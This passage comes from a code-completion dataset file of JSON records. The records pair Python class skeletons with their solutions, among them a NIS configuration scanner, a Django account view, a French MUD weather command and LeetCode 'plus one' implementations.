<|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not os.path.isfile(YPBIND_CONF_FILE):\n return False\n with open(YPBIND_CONF_FILE) as f:\n lines = [line.strip() for line in f.readlines() if line.strip()]\n for line in lines:\n if not line.startswith('#'):\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if not os.path.isdir(YPSERV_DIR_PATH):\n return False\n return any((f not in YPSERV_DEFAULT_FILES for f in os.listdir(YPSERV_DIR_PATH)))\n<|end_body_1|>\n\n<|body_start_2|>\n pkgs = []\n if self.server_has_non_default_configuration():\n pkgs.append('ypserv')\n if self.client_has_non_default_configuration():\n pkgs.append('ypbind')\n api.produce(NISConfig(nis_not_default_conf=pkgs))\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000262", "length_bytes": 1641, "license_type": "permissive", "methods": [{"docstring": "Check for any significant ypbind configuration lines in .conf file.", "name": "client_has_non_default_configuration", "signature": "def client_has_non_default_configuration(self)"}, {"docstring": "Check for any additional (not default) files in ypserv DIR.", "name": "server_has_non_default_configuration", "signature": "def server_has_non_default_configuration(self)"}, {"docstring": "Check NIS pkgs configuration for the following options: - yp.conf custom configuration - /var/yp not default entry", "name": "process", "signature": "def process(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_003906", "prompt": "Implement the Python class `NISScanLibrary` described below.\n\nClass description:\nHelper library for NISScan actor.\n\nMethod signatures and docstrings:\n- def client_has_non_default_configuration(self): Check for any significant ypbind configuration lines in .conf file.\n- def server_has_non_default_configuration(self): Check for any additional (not default) files in ypserv DIR.\n- def process(self): Check NIS pkgs configuration for the following options: - yp.conf custom configuration - /var/yp not default entry", "prompted_full_text": "Implement the Python class `NISScanLibrary` described below.\n\nClass description:\nHelper library for NISScan actor.\n\nMethod signatures and docstrings:\n- def client_has_non_default_configuration(self): Check for any significant ypbind configuration lines in .conf file.\n- def server_has_non_default_configuration(self): Check for any additional (not default) files in ypserv DIR.\n- def process(self): Check NIS pkgs configuration for the following options: - yp.conf custom configuration - /var/yp not default entry\n\n<|skeleton|>\nclass NISScanLibrary:\n \"\"\"Helper library for NISScan actor.\"\"\"\n\n def client_has_non_default_configuration(self):\n \"\"\"Check for any significant ypbind configuration lines in .conf file.\"\"\"\n <|body_0|>\n\n def server_has_non_default_configuration(self):\n \"\"\"Check for any additional (not default) files in ypserv DIR.\"\"\"\n <|body_1|>\n\n def process(self):\n \"\"\"Check NIS pkgs configuration for the following options: - yp.conf custom configuration - /var/yp not default entry\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not os.path.isfile(YPBIND_CONF_FILE):\n return False\n with open(YPBIND_CONF_FILE) as f:\n lines = [line.strip() for line in f.readlines() if line.strip()]\n for line in lines:\n if not line.startswith('#'):\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n if not os.path.isdir(YPSERV_DIR_PATH):\n return False\n return any((f not in YPSERV_DEFAULT_FILES for f in os.listdir(YPSERV_DIR_PATH)))\n<|end_body_1|>\n\n<|body_start_2|>\n pkgs = []\n if self.server_has_non_default_configuration():\n pkgs.append('ypserv')\n if self.client_has_non_default_configuration():\n pkgs.append('ypbind')\n api.produce(NISConfig(nis_not_default_conf=pkgs))\n<|end_body_2|>\n", "revision_id": "93c6fd4f150229a01ba43ce74214043cffaf7dce", "skeleton": "<|skeleton|>\nclass NISScanLibrary:\n \"\"\"Helper library for NISScan actor.\"\"\"\n\n def client_has_non_default_configuration(self):\n \"\"\"Check for any significant ypbind configuration lines in .conf file.\"\"\"\n <|body_0|>\n\n def server_has_non_default_configuration(self):\n \"\"\"Check for any additional (not default) files in ypserv DIR.\"\"\"\n <|body_1|>\n\n def process(self):\n \"\"\"Check NIS pkgs configuration for the following options: - yp.conf custom configuration - /var/yp not default entry\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class NISScanLibrary:\n \"\"\"Helper library for NISScan actor.\"\"\"\n\n def client_has_non_default_configuration(self):\n \"\"\"Check for any significant ypbind configuration lines in .conf file.\"\"\"\n if not os.path.isfile(YPBIND_CONF_FILE):\n return False\n with open(YPBIND_CONF_FILE) as f:\n lines = [line.strip() for line in f.readlines() if line.strip()]\n for line in lines:\n if not line.startswith('#'):\n return True\n return False\n\n def server_has_non_default_configuration(self):\n \"\"\"Check for any additional (not default) files in ypserv DIR.\"\"\"\n if not os.path.isdir(YPSERV_DIR_PATH):\n return False\n return any((f not in YPSERV_DEFAULT_FILES for f in os.listdir(YPSERV_DIR_PATH)))\n\n def process(self):\n \"\"\"Check NIS pkgs configuration for the following options: - yp.conf custom configuration - /var/yp not default entry\"\"\"\n pkgs = []\n if self.server_has_non_default_configuration():\n pkgs.append('ypserv')\n if self.client_has_non_default_configuration():\n pkgs.append('ypbind')\n api.produce(NISConfig(nis_not_default_conf=pkgs))\n", "source": "the_stack_v2_python_sparse", "source_path": "repos/system_upgrade/el8toel9/actors/nisscanner/libraries/nisscan.py", "source_repo": "oamg/leapp-repository", "split": "test", "star_events_count": 40} {"blob_id": "0a49a12b7aeef8bb51ffca1c6ad60c8a35ed2151", "bodies": ["self.id: uuid.UUID = uuid.uuid4()\nself.state: 'State' = state\nself.name: str = name\nself._cities: Set['City'] = set()", "self._cities.add(city)\nif reflexive:\n city.associate(self, reflexive=False)"], "bodies_text": "<|body_start_0|>\n self.id: uuid.UUID = uuid.uuid4()\n self.state: 'State' = state\n self.name: str = name\n self._cities: Set['City'] = set()\n<|end_body_0|>\n\n<|body_start_1|>\n self._cities.add(city)\n if reflexive:\n city.associate(self, reflexive=False)\n<|end_body_1|>\n", "class_docstring": "A country.", "class_name": "County", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass County:\n \"\"\"A country.\"\"\"\n\n def __init__(self, name: str, state: 'State'):\n \"\"\":param name: the name of the state :param state: the state in which the county resides\"\"\"\n <|body_0|>\n\n def associate(self, city: 'City', reflexive: bool=True):\n \"\"\"Associate this county with a city. :param city: the city which which the county is associated :param reflexive: if `True` the call will also attempt to create a back-reference to this county within the city\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.id: uuid.UUID = uuid.uuid4()\n self.state: 'State' = state\n self.name: str = name\n self._cities: Set['City'] = set()\n<|end_body_0|>\n\n<|body_start_1|>\n self._cities.add(city)\n if reflexive:\n city.associate(self, reflexive=False)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000263", "length_bytes": 8831, "license_type": "permissive", "methods": [{"docstring": ":param name: the name of the state :param state: the state in which the county resides", "name": "__init__", "signature": "def __init__(self, name: str, state: 'State')"}, {"docstring": "Associate this county with a city. :param city: the city which which the county is associated :param reflexive: if `True` the call will also attempt to create a back-reference to this county within the city", "name": "associate", "signature": "def associate(self, city: 'City', reflexive: bool=True)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000782", "prompt": "Implement the Python class `County` described below.\n\nClass description:\nA country.\n\nMethod signatures and docstrings:\n- def __init__(self, name: str, state: 'State'): :param name: the name of the state :param state: the state in which the county resides\n- def associate(self, city: 'City', reflexive: bool=True): Associate this county with a city. :param city: the city which which the county is associated :param reflexive: if `True` the call will also attempt to create a back-reference to this county within the city", "prompted_full_text": "Implement the Python class `County` described below.\n\nClass description:\nA country.\n\nMethod signatures and docstrings:\n- def __init__(self, name: str, state: 'State'): :param name: the name of the state :param state: the state in which the county resides\n- def associate(self, city: 'City', reflexive: bool=True): Associate this county with a city. :param city: the city which which the county is associated :param reflexive: if `True` the call will also attempt to create a back-reference to this county within the city\n\n<|skeleton|>\nclass County:\n \"\"\"A country.\"\"\"\n\n def __init__(self, name: str, state: 'State'):\n \"\"\":param name: the name of the state :param state: the state in which the county resides\"\"\"\n <|body_0|>\n\n def associate(self, city: 'City', reflexive: bool=True):\n \"\"\"Associate this county with a city. :param city: the city which which the county is associated :param reflexive: if `True` the call will also attempt to create a back-reference to this county within the city\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.id: uuid.UUID = uuid.uuid4()\n self.state: 'State' = state\n self.name: str = name\n self._cities: Set['City'] = set()\n<|end_body_0|>\n\n<|body_start_1|>\n self._cities.add(city)\n if reflexive:\n city.associate(self, reflexive=False)\n<|end_body_1|>\n", "revision_id": "f0750799eade79405e3f52e1a2a61dfd4e88dd4f", "skeleton": "<|skeleton|>\nclass County:\n \"\"\"A country.\"\"\"\n\n def __init__(self, name: str, state: 'State'):\n \"\"\":param name: the name of the state :param state: the state in which the county resides\"\"\"\n <|body_0|>\n\n def associate(self, city: 'City', reflexive: bool=True):\n \"\"\"Associate this county with a city. :param city: the city which which the county is associated :param reflexive: if `True` the call will also attempt to create a back-reference to this county within the city\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class County:\n \"\"\"A country.\"\"\"\n\n def __init__(self, name: str, state: 'State'):\n \"\"\":param name: the name of the state :param state: the state in which the county resides\"\"\"\n self.id: uuid.UUID = uuid.uuid4()\n self.state: 'State' = state\n self.name: str = name\n self._cities: Set['City'] = set()\n\n def associate(self, city: 'City', reflexive: bool=True):\n \"\"\"Associate this county with a city. :param city: the city which which the county is associated :param reflexive: if `True` the call will also attempt to create a back-reference to this county within the city\"\"\"\n self._cities.add(city)\n if reflexive:\n city.associate(self, reflexive=False)\n", "source": "the_stack_v2_python_sparse", "source_path": "Python_lib/cliff/model.py", "source_repo": "mndarren/Code-Lib", "split": "test", "star_events_count": 8} {"blob_id": "05d0a6fd9c981c37a461a33e67c09f1bd713475d", "bodies": ["user = self.request.user\nqueryset = self.queryset.filter(pk=user.pk)\nreturn queryset", "try:\n account = self.get_queryset().get()\nexcept Exception:\n return Response(status=status.HTTP_404_NOT_FOUND)\nserializer = self.get_serializer(account)\nreturn Response(serializer.data)"], "bodies_text": "<|body_start_0|>\n user = self.request.user\n queryset = self.queryset.filter(pk=user.pk)\n return queryset\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n account = self.get_queryset().get()\n except Exception:\n return Response(status=status.HTTP_404_NOT_FOUND)\n serializer = self.get_serializer(account)\n return Response(serializer.data)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "AccountView", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AccountView:\n\n def get_queryset(self):\n \"\"\"Filter account by user pk :return: queryset\"\"\"\n <|body_0|>\n\n def list(self, request, *args, **kwargs):\n \"\"\"Redeclared list method to return one instance :param request: :param args: :param kwargs: :return: Response()\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user = self.request.user\n queryset = self.queryset.filter(pk=user.pk)\n return queryset\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n account = self.get_queryset().get()\n except Exception:\n return Response(status=status.HTTP_404_NOT_FOUND)\n serializer = self.get_serializer(account)\n return Response(serializer.data)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000264", "length_bytes": 4771, "license_type": "no_license", "methods": [{"docstring": "Filter account by user pk :return: queryset", "name": "get_queryset", "signature": "def get_queryset(self)"}, {"docstring": "Redeclared list method to return one instance :param request: :param args: :param kwargs: :return: Response()", "name": "list", "signature": "def list(self, request, *args, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001996", "prompt": "Implement the Python class `AccountView` described below.\n\nClass description:\nImplement the AccountView class.\n\nMethod signatures and docstrings:\n- def get_queryset(self): Filter account by user pk :return: queryset\n- def list(self, request, *args, **kwargs): Redeclared list method to return one instance :param request: :param args: :param kwargs: :return: Response()", "prompted_full_text": "Implement the Python class `AccountView` described below.\n\nClass description:\nImplement the AccountView class.\n\nMethod signatures and docstrings:\n- def get_queryset(self): Filter account by user pk :return: queryset\n- def list(self, request, *args, **kwargs): Redeclared list method to return one instance :param request: :param args: :param kwargs: :return: Response()\n\n<|skeleton|>\nclass AccountView:\n\n def get_queryset(self):\n \"\"\"Filter account by user pk :return: queryset\"\"\"\n <|body_0|>\n\n def list(self, request, *args, **kwargs):\n \"\"\"Redeclared list method to return one instance :param request: :param args: :param kwargs: :return: Response()\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n user = self.request.user\n queryset = self.queryset.filter(pk=user.pk)\n return queryset\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n account = self.get_queryset().get()\n except Exception:\n return Response(status=status.HTTP_404_NOT_FOUND)\n serializer = self.get_serializer(account)\n return Response(serializer.data)\n<|end_body_1|>\n", "revision_id": "0e3e755d49b284eb3e7ec2c2f8542d013d313abd", "skeleton": "<|skeleton|>\nclass AccountView:\n\n def get_queryset(self):\n \"\"\"Filter account by user pk :return: queryset\"\"\"\n <|body_0|>\n\n def list(self, request, *args, **kwargs):\n \"\"\"Redeclared list method to return one instance :param request: :param args: :param kwargs: :return: Response()\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AccountView:\n def get_queryset(self):\n \"\"\"Filter account by user pk :return: queryset\"\"\"\n user = self.request.user\n queryset = self.queryset.filter(pk=user.pk)\n return queryset\n\n def list(self, request, *args, **kwargs):\n \"\"\"Redeclared list method to return one instance :param request: :param args: :param kwargs: :return: Response()\"\"\"\n try:\n account = self.get_queryset().get()\n except Exception:\n return Response(status=status.HTTP_404_NOT_FOUND)\n serializer = self.get_serializer(account)\n return Response(serializer.data)\n", "source": "the_stack_v2_python_sparse", "source_path": "grc_account/views.py", "source_repo": "kolexander/common", "split": "test", "star_events_count": 0} {"blob_id": "797dfcfff6749fb51880e5888829a1c957e406fe", "bodies": ["Parametre.__init__(self, 'creer', 'create')\nself.schema = '()'\nself.aide_courte = 'crée une perturbation'\nself.aide_longue = \"Cette commande permet de créer une perturbation météorologique dans la salle où vous vous trouvez (par exemple, faire apparaître un nuage). La salle où vous vous trouvez est prise comme point de départ. Notez que vous ne pourrez pas faire apparaître une perturbation si une autre est présente ou trop proche. Les perturbations ont en effet des rayons d'action, et deux perturbations ne doivent pas entrer en conflit (un nuage ne doit pas en recouvrir un second, par exemple). Si vous ne savez pas quelles perturbations sont disponibles, entrez la commande sans paramètre.\"", "if dic_masques['cle']:\n cle = dic_masques['cle'].cle\n classe = None\n for t_classe in importeur.meteo.perturbations:\n if t_classe.nom_pertu == cle and t_classe.origine:\n classe = t_classe\n break\n if classe is None:\n personnage << \"|err|Cette perturbation n'existe pas.|ff|\"\n return\n if not personnage.salle.coords.valide:\n personnage << '|err|Vous vous trouvez dans une salle sans coordonnées.|ff|'\n return\n n_pertu = classe(personnage.salle.coords.get_copie())\n for pertu in importeur.meteo.perturbations_actuelles:\n if n_pertu.va_recouvrir(pertu):\n personnage << '|err|Une autre perturbation est trop proche de vous.|ff|'\n n_pertu.detruire()\n return\n personnage << 'Vous avez bien créé une nouvelle perturbation {}.'.format(n_pertu.nom_pertu)\n importeur.meteo.perturbations_actuelles.append(n_pertu)\n n_pertu.envoyer_message_debut()\nelse:\n tableau = Tableau('Perturbations existantes')\n tableau.ajouter_colonne('Clé')\n tableau.ajouter_colonne('Attributs')\n for perturbation in sorted(importeur.meteo.perturbations, key=lambda p: p.nom_pertu):\n attributs = ', '.join(perturbation.attributs)\n tableau.ajouter_ligne(perturbation.nom_pertu, attributs)\n personnage << tableau.afficher()"], "bodies_text": "<|body_start_0|>\n Parametre.__init__(self, 'creer', 'create')\n self.schema = '()'\n self.aide_courte = 'crée une perturbation'\n self.aide_longue = \"Cette commande permet de créer une perturbation météorologique dans la salle où vous vous trouvez (par exemple, faire apparaître un nuage). La salle où vous vous trouvez est prise comme point de départ. Notez que vous ne pourrez pas faire apparaître une perturbation si une autre est présente ou trop proche. Les perturbations ont en effet des rayons d'action, et deux perturbations ne doivent pas entrer en conflit (un nuage ne doit pas en recouvrir un second, par exemple). Si vous ne savez pas quelles perturbations sont disponibles, entrez la commande sans paramètre.\"\n<|end_body_0|>\n\n<|body_start_1|>\n if dic_masques['cle']:\n cle = dic_masques['cle'].cle\n classe = None\n for t_classe in importeur.meteo.perturbations:\n if t_classe.nom_pertu == cle and t_classe.origine:\n classe = t_classe\n break\n if classe is None:\n personnage << \"|err|Cette perturbation n'existe pas.|ff|\"\n return\n if not personnage.salle.coords.valide:\n personnage << '|err|Vous vous trouvez dans une salle sans coordonnées.|ff|'\n return\n n_pertu = classe(personnage.salle.coords.get_copie())\n for pertu in importeur.meteo.perturbations_actuelles:\n if n_pertu.va_recouvrir(pertu):\n personnage << '|err|Une autre perturbation est trop proche de vous.|ff|'\n n_pertu.detruire()\n return\n personnage << 'Vous avez bien créé une nouvelle perturbation {}.'.format(n_pertu.nom_pertu)\n importeur.meteo.perturbations_actuelles.append(n_pertu)\n n_pertu.envoyer_message_debut()\n else:\n tableau = Tableau('Perturbations existantes')\n tableau.ajouter_colonne('Clé')\n tableau.ajouter_colonne('Attributs')\n for perturbation in sorted(importeur.meteo.perturbations, key=lambda p: p.nom_pertu):\n attributs = ', '.join(perturbation.attributs)\n tableau.ajouter_ligne(perturbation.nom_pertu, attributs)\n personnage << tableau.afficher()\n<|end_body_1|>\n", "class_docstring": "Commande 'meteo créer'", "class_name": "PrmCreer", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PrmCreer:\n \"\"\"Commande 'meteo créer'\"\"\"\n\n def __init__(self):\n \"\"\"Constructeur du paramètre.\"\"\"\n <|body_0|>\n\n def interpreter(self, personnage, dic_masques):\n \"\"\"Méthode d'interprétation de commande\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Parametre.__init__(self, 'creer', 'create')\n self.schema = '()'\n self.aide_courte = 'crée une perturbation'\n self.aide_longue = \"Cette commande permet de créer une perturbation météorologique dans la salle où vous vous trouvez (par exemple, faire apparaître un nuage). La salle où vous vous trouvez est prise comme point de départ. Notez que vous ne pourrez pas faire apparaître une perturbation si une autre est présente ou trop proche. Les perturbations ont en effet des rayons d'action, et deux perturbations ne doivent pas entrer en conflit (un nuage ne doit pas en recouvrir un second, par exemple). Si vous ne savez pas quelles perturbations sont disponibles, entrez la commande sans paramètre.\"\n<|end_body_0|>\n\n<|body_start_1|>\n if dic_masques['cle']:\n cle = dic_masques['cle'].cle\n classe = None\n for t_classe in importeur.meteo.perturbations:\n if t_classe.nom_pertu == cle and t_classe.origine:\n classe = t_classe\n break\n if classe is None:\n personnage << \"|err|Cette perturbation n'existe pas.|ff|\"\n return\n if not personnage.salle.coords.valide:\n personnage << '|err|Vous vous trouvez dans une salle sans coordonnées.|ff|'\n return\n n_pertu = classe(personnage.salle.coords.get_copie())\n for pertu in importeur.meteo.perturbations_actuelles:\n if n_pertu.va_recouvrir(pertu):\n personnage << '|err|Une autre perturbation est trop proche de vous.|ff|'\n n_pertu.detruire()\n return\n personnage << 'Vous avez bien créé une nouvelle perturbation {}.'.format(n_pertu.nom_pertu)\n importeur.meteo.perturbations_actuelles.append(n_pertu)\n n_pertu.envoyer_message_debut()\n else:\n tableau = Tableau('Perturbations existantes')\n tableau.ajouter_colonne('Clé')\n tableau.ajouter_colonne('Attributs')\n for perturbation in sorted(importeur.meteo.perturbations, key=lambda p: p.nom_pertu):\n attributs = ', '.join(perturbation.attributs)\n tableau.ajouter_ligne(perturbation.nom_pertu, attributs)\n personnage << tableau.afficher()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000265", "length_bytes": 4658, "license_type": "permissive", "methods": [{"docstring": "Constructeur du paramètre.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Méthode d'interprétation de commande", "name": "interpreter", "signature": "def interpreter(self, personnage, dic_masques)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004934", "prompt": "Implement the Python class `PrmCreer` described below.\n\nClass description:\nCommande 'meteo créer'\n\nMethod signatures and docstrings:\n- def __init__(self): Constructeur du paramètre.\n- def interpreter(self, personnage, dic_masques): Méthode d'interprétation de commande", "prompted_full_text": "Implement the Python class `PrmCreer` described below.\n\nClass description:\nCommande 'meteo créer'\n\nMethod signatures and docstrings:\n- def __init__(self): Constructeur du paramètre.\n- def interpreter(self, personnage, dic_masques): Méthode d'interprétation de commande\n\n<|skeleton|>\nclass PrmCreer:\n \"\"\"Commande 'meteo créer'\"\"\"\n\n def __init__(self):\n \"\"\"Constructeur du paramètre.\"\"\"\n <|body_0|>\n\n def interpreter(self, personnage, dic_masques):\n \"\"\"Méthode d'interprétation de commande\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Parametre.__init__(self, 'creer', 'create')\n self.schema = '()'\n self.aide_courte = 'crée une perturbation'\n self.aide_longue = \"Cette commande permet de créer une perturbation météorologique dans la salle où vous vous trouvez (par exemple, faire apparaître un nuage). La salle où vous vous trouvez est prise comme point de départ. Notez que vous ne pourrez pas faire apparaître une perturbation si une autre est présente ou trop proche. Les perturbations ont en effet des rayons d'action, et deux perturbations ne doivent pas entrer en conflit (un nuage ne doit pas en recouvrir un second, par exemple). Si vous ne savez pas quelles perturbations sont disponibles, entrez la commande sans paramètre.\"\n<|end_body_0|>\n\n<|body_start_1|>\n if dic_masques['cle']:\n cle = dic_masques['cle'].cle\n classe = None\n for t_classe in importeur.meteo.perturbations:\n if t_classe.nom_pertu == cle and t_classe.origine:\n classe = t_classe\n break\n if classe is None:\n personnage << \"|err|Cette perturbation n'existe pas.|ff|\"\n return\n if not personnage.salle.coords.valide:\n personnage << '|err|Vous vous trouvez dans une salle sans coordonnées.|ff|'\n return\n n_pertu = classe(personnage.salle.coords.get_copie())\n for pertu in importeur.meteo.perturbations_actuelles:\n if n_pertu.va_recouvrir(pertu):\n personnage << '|err|Une autre perturbation est trop proche de vous.|ff|'\n n_pertu.detruire()\n return\n personnage << 'Vous avez bien créé une nouvelle perturbation {}.'.format(n_pertu.nom_pertu)\n importeur.meteo.perturbations_actuelles.append(n_pertu)\n n_pertu.envoyer_message_debut()\n else:\n tableau = Tableau('Perturbations existantes')\n tableau.ajouter_colonne('Clé')\n tableau.ajouter_colonne('Attributs')\n for perturbation in sorted(importeur.meteo.perturbations, key=lambda p: p.nom_pertu):\n attributs = ', '.join(perturbation.attributs)\n tableau.ajouter_ligne(perturbation.nom_pertu, attributs)\n personnage << tableau.afficher()\n<|end_body_1|>\n", "revision_id": "7e93bff08cdf891352efba587e89c40f3b4a2301", "skeleton": "<|skeleton|>\nclass PrmCreer:\n \"\"\"Commande 'meteo créer'\"\"\"\n\n def __init__(self):\n \"\"\"Constructeur du paramètre.\"\"\"\n <|body_0|>\n\n def interpreter(self, personnage, dic_masques):\n \"\"\"Méthode d'interprétation de commande\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PrmCreer:\n \"\"\"Commande 'meteo créer'\"\"\"\n\n def __init__(self):\n \"\"\"Constructeur du paramètre.\"\"\"\n Parametre.__init__(self, 'creer', 'create')\n self.schema = '()'\n self.aide_courte = 'crée une perturbation'\n self.aide_longue = \"Cette commande permet de créer une perturbation météorologique dans la salle où vous vous trouvez (par exemple, faire apparaître un nuage). La salle où vous vous trouvez est prise comme point de départ. Notez que vous ne pourrez pas faire apparaître une perturbation si une autre est présente ou trop proche. Les perturbations ont en effet des rayons d'action, et deux perturbations ne doivent pas entrer en conflit (un nuage ne doit pas en recouvrir un second, par exemple). Si vous ne savez pas quelles perturbations sont disponibles, entrez la commande sans paramètre.\"\n\n def interpreter(self, personnage, dic_masques):\n \"\"\"Méthode d'interprétation de commande\"\"\"\n if dic_masques['cle']:\n cle = dic_masques['cle'].cle\n classe = None\n for t_classe in importeur.meteo.perturbations:\n if t_classe.nom_pertu == cle and t_classe.origine:\n classe = t_classe\n break\n if classe is None:\n personnage << \"|err|Cette perturbation n'existe pas.|ff|\"\n return\n if not personnage.salle.coords.valide:\n personnage << '|err|Vous vous trouvez dans une salle sans coordonnées.|ff|'\n return\n n_pertu = classe(personnage.salle.coords.get_copie())\n for pertu in importeur.meteo.perturbations_actuelles:\n if n_pertu.va_recouvrir(pertu):\n personnage << '|err|Une autre perturbation est trop proche de vous.|ff|'\n n_pertu.detruire()\n return\n personnage << 'Vous avez bien créé une nouvelle perturbation {}.'.format(n_pertu.nom_pertu)\n importeur.meteo.perturbations_actuelles.append(n_pertu)\n n_pertu.envoyer_message_debut()\n else:\n tableau = Tableau('Perturbations existantes')\n tableau.ajouter_colonne('Clé')\n tableau.ajouter_colonne('Attributs')\n for perturbation in sorted(importeur.meteo.perturbations, key=lambda p: p.nom_pertu):\n attributs = ', '.join(perturbation.attributs)\n tableau.ajouter_ligne(perturbation.nom_pertu, attributs)\n personnage << tableau.afficher()\n", "source": "the_stack_v2_python_sparse", "source_path": "src/primaires/meteo/commandes/meteo/creer.py", "source_repo": "vincent-lg/tsunami", "split": "test", "star_events_count": 5} {"blob_id": "237301f707617ec931ab8dc4acd3b066752d3196", "bodies": ["digits = digits[::-1]\nprint(digits)\nl = len(digits)\np = l - 1\nf = False\nwhile p >= 0:\n if digits[p] != 9:\n digits[p] += 1\n if f == True or p == l - 1:\n return digits\n else:\n f = True\n digits[p] = 0\n p -= 1\n if p == -1:\n digits.insert(0, 1)\n return digits", "length = len(digits)\ndigits = digits[::-1]\nfor i in range(length):\n if digits[i] + 1 < 10:\n digits[i] = digits[i] + 1\n break\n elif i != length - 1:\n digits[i] = 0\n else:\n digits[i] = 0\n digits.append(1)\ndigits = digits[::-1]\nreturn digits", "s = ''\nfor i in digits:\n s += str(i)\ns = int(s)\ns += 1\ns = str(s)\ndigits = []\nfor i in s:\n digits.append(int(i))\nreturn digits"], "bodies_text": "<|body_start_0|>\n digits = digits[::-1]\n print(digits)\n l = len(digits)\n p = l - 1\n f = False\n while p >= 0:\n if digits[p] != 9:\n digits[p] += 1\n if f == True or p == l - 1:\n return digits\n else:\n f = True\n digits[p] = 0\n p -= 1\n if p == -1:\n digits.insert(0, 1)\n return digits\n<|end_body_0|>\n\n<|body_start_1|>\n length = len(digits)\n digits = digits[::-1]\n for i in range(length):\n if digits[i] + 1 < 10:\n digits[i] = digits[i] + 1\n break\n elif i != length - 1:\n digits[i] = 0\n else:\n digits[i] = 0\n digits.append(1)\n digits = digits[::-1]\n return digits\n<|end_body_1|>\n\n<|body_start_2|>\n s = ''\n for i in digits:\n s += str(i)\n s = int(s)\n s += 1\n s = str(s)\n digits = []\n for i in s:\n digits.append(int(i))\n return digits\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def plusOne(self, digits):\n \"\"\":type digits: List[int] :rtype: List[int] 正序计算\"\"\"\n <|body_0|>\n\n def plusOne2(self, digits):\n \"\"\":type digits: List[int] :rtype: List[int] 反转数组,从左往右计算 反转后第一位+1小于10,则+1即可退出循环 反转后第一位+1=10,则当前位=0,继续循环;最后一位时直接=0且最后增加一位1\"\"\"\n <|body_1|>\n\n def plusOne3(self, digits):\n \"\"\":type digits: List[int] :rtype: List[int] 类型转换的方法\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n digits = digits[::-1]\n print(digits)\n l = len(digits)\n p = l - 1\n f = False\n while p >= 0:\n if digits[p] != 9:\n digits[p] += 1\n if f == True or p == l - 1:\n return digits\n else:\n f = True\n digits[p] = 0\n p -= 1\n if p == -1:\n digits.insert(0, 1)\n return digits\n<|end_body_0|>\n\n<|body_start_1|>\n length = len(digits)\n digits = digits[::-1]\n for i in range(length):\n if digits[i] + 1 < 10:\n digits[i] = digits[i] + 1\n break\n elif i != length - 1:\n digits[i] = 0\n else:\n digits[i] = 0\n digits.append(1)\n digits = digits[::-1]\n return digits\n<|end_body_1|>\n\n<|body_start_2|>\n s = ''\n for i in digits:\n s += str(i)\n s = int(s)\n s += 1\n s = str(s)\n digits = []\n for i in s:\n digits.append(int(i))\n return digits\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000266", "length_bytes": 2450, "license_type": "no_license", "methods": [{"docstring": ":type digits: List[int] :rtype: List[int] 正序计算", "name": "plusOne", "signature": "def plusOne(self, digits)"}, {"docstring": ":type digits: List[int] :rtype: List[int] 反转数组,从左往右计算 反转后第一位+1小于10,则+1即可退出循环 反转后第一位+1=10,则当前位=0,继续循环;最后一位时直接=0且最后增加一位1", "name": "plusOne2", "signature": "def plusOne2(self, digits)"}, {"docstring": ":type digits: List[int] :rtype: List[int] 类型转换的方法", "name": "plusOne3", "signature": "def plusOne3(self, digits)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_003893", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def plusOne(self, digits): :type digits: List[int] :rtype: List[int] 正序计算\n- def plusOne2(self, digits): :type digits: List[int] :rtype: List[int] 反转数组,从左往右计算 反转后第一位+1小于10,则+1即可退出循环 反转后第一位+1=10,则当前位=0,继续循环;最后一位时直接=0且最后增加一位1\n- def plusOne3(self, digits): :type digits: List[int] :rtype: List[int] 类型转换的方法", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution 